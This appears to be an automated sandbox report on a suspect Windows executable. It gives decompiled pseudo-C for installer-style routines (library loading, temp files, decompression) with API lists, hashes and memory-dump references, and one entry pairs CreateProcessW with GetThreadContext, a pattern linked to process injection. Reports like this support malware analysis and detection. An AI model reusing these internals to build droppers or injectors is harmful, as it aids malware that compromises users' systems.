                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                        • String ID: C:\Users\user\Desktop$Ls@$\s@
                        • API String ID: 3449924974-1629030221
                        • Opcode ID: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                        • Instruction ID: c25a7037d2469be4335b8e9940eeaad57ca25a66f44a15dc7ff8fd6819e2376f
                        • Opcode Fuzzy Hash: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                        • Instruction Fuzzy Hash: 030108B1D14219EAEF119FA4CC047EFBFB8EB14354F004176D904B6280D7B8A604DFAA
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1001AFE4, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 237processthreadCOMMON
                        Download Yara Rule
                        APIs
                        • CreateProcessW.KERNELBASE(?,00000000), ref: 1001B128
                        • GetThreadContext.KERNELBASE(?,00010007), ref: 1001B14B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.354975376.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.354899107.0000000010000000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354904922.0000000010001000.00000020.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354953530.0000000010014000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354995139.000000001001F000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: ContextCreateProcessThread
                        • String ID: D
                        • API String ID: 2843130473-2746444292
                        • Opcode ID: fcf47618883c15d8ce39f63424c4af1625f9669ec87a248e41ff3bcdd2e79046
                        • Instruction ID: 204b2d5fc7148e404a3685a33b2da177d27935a8f8b937e014704188573a91a5
                        • Opcode Fuzzy Hash: fcf47618883c15d8ce39f63424c4af1625f9669ec87a248e41ff3bcdd2e79046
                        • Instruction Fuzzy Hash: F9A1D274E00209AFDB51DFA4C985BAEBBF5EF48344F204465E915EB291E730EA85DF10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1000CBA6, Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                        Download Yara Rule
                        C-Code - Quality: 91%
                        			E1000CBA6(void* __ebx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long* _t9;
				long _t14;
				long* _t27;

				E10008836(_t3);
				if(E1000A00A() != 0) {
					_t6 = E10009B8B(E1000C988);
					 *0x1001bd80 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t9 = E1000A3A9(1, 0x3bc); // executed
						_t27 = _t9;
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E1000CC1C();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E10009BE7( *0x1001bd80, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E1000CAF3(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E1000CC1C();
					return 0;
				}
			}









                        0x1000cba6
                        0x1000cbb2
                        0x1000cbc1
                        0x1000cbc6
                        0x1000cbcc
                        0x1000cbcf
                        0x00000000
                        0x1000cbd1
                        0x1000cbd9
                        0x1000cbde
                        0x1000cbe2
                        0x1000cbe4
                        0x1000cc13
                        0x1000cc13
                        0x1000cc18
                        0x1000cc1b
                        0x1000cbe6
                        0x1000cbf4
                        0x1000cbf6
                        0x00000000
                        0x1000cbf8
                        0x1000cbf8
                        0x1000cbfa
                        0x1000cbfb
                        0x1000cc02
                        0x1000cc08
                        0x1000cc0c
                        0x1000cc10
                        0x1000cc12
                        0x1000cc12
                        0x1000cbf6
                        0x1000cbe4
                        0x1000cbb4
                        0x1000cbb4
                        0x1000cbb4
                        0x1000cbbb
                        0x1000cbbb

                        APIs
                        • __init_pointers.LIBCMT ref: 1000CBA6
                          • Part of subcall function 10008836: RtlEncodePointer.NTDLL(00000000,00000001,1000CBAB,10012861,10019678,00000008,10012A29,?,00000001,?,10019698,0000000C,10012AF9,?,00000001,?), ref: 10008839
                          • Part of subcall function 10008836: __initp_misc_winsig.LIBCMT ref: 10008854
                          • Part of subcall function 10008836: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 10009C4C
                          • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 10009C60
                          • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 10009C73
                          • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 10009C86
                          • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 10009C99
                          • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 10009CAC
                          • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 10009CBF
                          • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 10009CD2
                          • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 10009CE5
                          • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 10009CF8
                          • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 10009D0B
                          • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 10009D1E
                          • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 10009D31
                          • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 10009D44
                          • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 10009D57
                          • Part of subcall function 10008836: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 10009D6A
                        • __mtinitlocks.LIBCMT ref: 1000CBAB
                        • __mtterm.LIBCMT ref: 1000CBB4
                        • __calloc_crt.LIBCMT ref: 1000CBD9
                        • __initptd.LIBCMT ref: 1000CBFB
                        • GetCurrentThreadId.KERNEL32 ref: 1000CC02
                        Memory Dump Source
                        • Source File: 00000000.00000002.354904922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.354899107.0000000010000000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354953530.0000000010014000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354975376.000000001001A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354995139.000000001001F000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: AddressProc$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
                        • String ID:
                        • API String ID: 1593083391-0
                        • Opcode ID: d229d58d30c36d976af7e9a4b76e6a0611398b88a7b00fb45280411ba99e137e
                        • Instruction ID: 872189c19f1b9b56bcbc864356aa7e55cb83f512621a5c4e7cdc88d93098953a
                        • Opcode Fuzzy Hash: d229d58d30c36d976af7e9a4b76e6a0611398b88a7b00fb45280411ba99e137e
                        • Instruction Fuzzy Hash: 33F09036619B291AF224E775BC03F8A36C4DB026F4F24461AF8A4D50EEFF20A9818250
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00405EBA, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00405EBA(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x409010; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                        0x00405ed1
                        0x00405eda
                        0x00405edc
                        0x00405edc
                        0x00405ee0
                        0x00405ef2
                        0x00405eec
                        0x00405eec
                        0x00405eec
                        0x00405ef6
                        0x00405f0a
                        0x00405f1e
                        0x00405f25

                        APIs
                        • GetSystemDirectoryA.KERNEL32 ref: 00405ED1
                        • wsprintfA.USER32 ref: 00405F0A
                        • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F1E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: DirectoryLibraryLoadSystemwsprintf
                        • String ID: %s%s.dll$UXTHEME$\
                        • API String ID: 2200240437-4240819195
                        • Opcode ID: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                        • Instruction ID: e0394f74180a6a16eba84a37178681bb1de021cb3750537530e5e19d16d25b78
                        • Opcode Fuzzy Hash: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                        • Instruction Fuzzy Hash: AFF09C3094050967DB159B68DD0DFFB365CF708305F1405B7B586E11C2DA74E9158FD9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040589E, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0040589E(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                        0x004058a2
                        0x004058a8
                        0x004058a9
                        0x004058a9
                        0x004058aa
                        0x004058b1
                        0x004058bb
                        0x004058c8
                        0x004058cb
                        0x004058d3
                        0x00000000
                        0x00000000
                        0x004058d7
                        0x00000000
                        0x00000000
                        0x004058d9
                        0x00000000
                        0x004058d9
                        0x00000000

                        APIs
                        • GetTickCount.KERNEL32 ref: 004058B1
                        • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004058CB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: CountFileNameTempTick
                        • String ID: "C:\Users\user\Desktop\aZOmps0Ug8.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                        • API String ID: 1716503409-472685248
                        • Opcode ID: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                        • Instruction ID: e60e9e2f6482c2c4b9a71223117799e22c549444224f45eff9547ee1bfe60b0e
                        • Opcode Fuzzy Hash: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                        • Instruction Fuzzy Hash: 46F0A7373482447AE7105E55DC04B9B7F9DDFD1750F10C027FE049A280D6B49954C7A5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1001A7DD, Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 1001A982
                        Memory Dump Source
                        • Source File: 00000000.00000002.354975376.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.354899107.0000000010000000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354904922.0000000010001000.00000020.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354953530.0000000010014000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354995139.000000001001F000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        • Opcode ID: 285312dd81f11b31d3960dc45421414153d4e12663f0420dd89474b5e600b846
                        • Instruction ID: 2e69d428b20c1ed263818dbe0589d30943340eac1341f7e214569043d894dc63
                        • Opcode Fuzzy Hash: 285312dd81f11b31d3960dc45421414153d4e12663f0420dd89474b5e600b846
                        • Instruction Fuzzy Hash: BB612939E50348AADB50CBE4ED16BADB7B5EF48710F20841AE604EE2E0E7705EC1DB05
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00401F84, Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                        Download Yara Rule
                        C-Code - Quality: 60%
                        			E00401F84(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x423ff8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x423fc8 =  *0x423fc8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402A29(0xfffffff0);
				 *(_t34 + 8) = E00402A29(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404E84(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x425000, 0x40b010, 0x409000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E0040358B(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                        0x00401f84
                        0x00401f84
                        0x00401f89
                        0x00401f90
                        0x0040204c
                        0x00402197
                        0x00402197
                        0x004028be
                        0x004028c1
                        0x004028cd
                        0x004028cd
                        0x00401f9f
                        0x00401fa9
                        0x00401fac
                        0x00401fbb
                        0x00401fbf
                        0x00401fc5
                        0x00401fc9
                        0x00402045
                        0x00000000
                        0x00402045
                        0x00401fcb
                        0x00401fd5
                        0x00401fd9
                        0x0040201d
                        0x00401fdb
                        0x00401fde
                        0x00401fe1
                        0x00402011
                        0x00401fe3
                        0x00401fe6
                        0x00401fef
                        0x00401ff1
                        0x00401ff1
                        0x00401fef
                        0x00401fe1
                        0x00402025
                        0x0040203a
                        0x0040203a
                        0x00000000
                        0x00402025
                        0x00401faf
                        0x00401fb5
                        0x00401fb9
                        0x00000000
                        0x00000000
                        0x00000000

                        APIs
                        • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FAF
                          • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                          • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                          • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                          • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                          • Part of subcall function 00404E84: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F18
                          • Part of subcall function 00404E84: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F32
                          • Part of subcall function 00404E84: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F40
                        • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
                        • GetProcAddress.KERNEL32(00000000,?), ref: 00401FCF
                        • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                        • String ID:
                        • API String ID: 2987980305-0
                        • Opcode ID: 50cd007fc7b77623f8c7ad5bc39ef5e257e3bb497f63aa12232a7c38023ecf07
                        • Instruction ID: 27648393275eec621602a0353e8cc2bfbc6c1dadd98057bfccdba155e6fc7477
                        • Opcode Fuzzy Hash: 50cd007fc7b77623f8c7ad5bc39ef5e257e3bb497f63aa12232a7c38023ecf07
                        • Instruction Fuzzy Hash: 07215732D04215ABDF216FA48F4DAAE7970AF44354F60423FFA11B22E0CBBC4981D65E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004015B3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                        Download Yara Rule
                        C-Code - Quality: 87%
                        			E004015B3(char __ebx) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402A29(0xfffffff0);
				_t13 = E0040571F(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E004056B6(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E004053C3(_t28);
						} else {
							_t38 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004053E0(_t38) == 0) {
								goto L5;
							} else {
								_t22 = E00405346(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405B98("C:\\Users\\engineer\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                        0x004015b3
                        0x004015ba
                        0x004015bd
                        0x004015c2
                        0x004015c6
                        0x004015c8
                        0x004015d0
                        0x004015d2
                        0x004015d4
                        0x004015d8
                        0x004015db
                        0x004015f3
                        0x004015f4
                        0x004015dd
                        0x004015dd
                        0x004015e0
                        0x00000000
                        0x004015eb
                        0x004015ec
                        0x004015ec
                        0x004015e0
                        0x004015fb
                        0x00401602
                        0x0040160f
                        0x0040160f
                        0x00401604
                        0x00401605
                        0x0040160d
                        0x00000000
                        0x00000000
                        0x0040160d
                        0x00401602
                        0x00401612
                        0x00401615
                        0x00401617
                        0x00401618
                        0x004015c8
                        0x0040161f
                        0x0040164a
                        0x00402197
                        0x00401621
                        0x00401623
                        0x0040162e
                        0x00401634
                        0x0040163c
                        0x00401642
                        0x00401642
                        0x0040163c
                        0x004028c1
                        0x004028cd

                        APIs
                          • Part of subcall function 0040571F: CharNextA.USER32(004054D1,?,00421940,00000000,00405783,00421940,00421940,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040572D
                          • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405732
                          • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405741
                        • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                          • Part of subcall function 00405346: CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 00405389
                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401634
                        Strings
                        • C:\Users\user\AppData\Local\Temp, xrefs: 00401629
                        Memory Dump Source
                        • Source File: 00000000.00000002.352449579.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.352433071.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352490534.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352519331.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352647992.0000000000422000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352679041.000000000042A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.352707712.000000000042D000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                        • String ID: C:\Users\user\AppData\Local\Temp
                        • API String ID: 1892508949-1104044542
                        • Opcode ID: 2bf56f72201c9e699422734a4e548a5e4c3f3c6807ff828ac4a79b9dc522e826
                        • Instruction ID: 7e794a0d764ef42534189bc4677109bd04a63590121f3ac1906b169044d7ab5d
                        • Opcode Fuzzy Hash: 2bf56f72201c9e699422734a4e548a5e4c3f3c6807ff828ac4a79b9dc522e826
                        • Instruction Fuzzy Hash: 67112B35504141ABEF317BA55D419BF26B0EE92314728063FF582722D2C63C0943A62F
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00406609, Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                        Download Yara Rule
                        C-Code - Quality: 99%
                        			E00406609() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00406A77))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4)); // executed
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8)); // executed
											}
